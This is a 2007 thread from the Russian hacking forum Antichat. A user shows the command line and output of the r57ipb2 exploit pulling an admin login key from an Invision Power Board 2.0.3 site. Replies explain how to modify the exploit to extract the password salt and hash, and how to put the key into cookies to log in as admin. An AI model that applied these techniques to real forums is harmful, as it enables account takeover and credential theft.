Форум АНТИЧАТ - Ipb 2.0.3 пасс есть, соли нет

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Ipb 2.0.3 пасс есть, соли нет (https://forum.antichat.xyz/showthread.php?t=41096)

GooD and EviL

28.05.2007 23:15

Ipb 2.0.3 пасс есть, соли нет

всем привет, и так нашёл я уязвимый IPB 2.0.3 сплоитом r57ipb2 выдрал хэш

Код:

P:\Perl\exploits\ipb>ipb.pl site.com /forum/ 2 1

[~]    SERVER : site.com

[~]      PATH : /forum/

[~] MEMBER ID : 2

[~]    TARGET : 1 - IPB 2.*

[~] SEARCHING PASSWORD ... [ DONE ]



MEMBER ID : 1

MEMBER_LOGIN_KEY : 50f96222737183fc4aa467b421c08c42

но салта нет, попробывал сплоит Coyl, но он не сработал и салт я не получил.
Вопрос: как получить соль?

maxster

29.05.2007 13:53

это даже не хеш !
это логин кей, он шифруеться алгоритмом мд5(салт.хеш)- расшифровки без соли не подлежит,
достаточно не много переписать сплойт и он выдаст соль и хеш.

blackybr

30.05.2007 16:06

То что тебе выдало может быть заменено в кукисах для логина под админом.
Для других замени member_login_key на converge_pass_hash и converge_pass_salt

maxster

31.05.2007 17:21

Цитата:

Сообщение от blackybr

И еще таблицу надо сменить с ibf_members, на ibf_members_converge, ibf стандартный префикс, так что он может быть другой.

Время: 02:43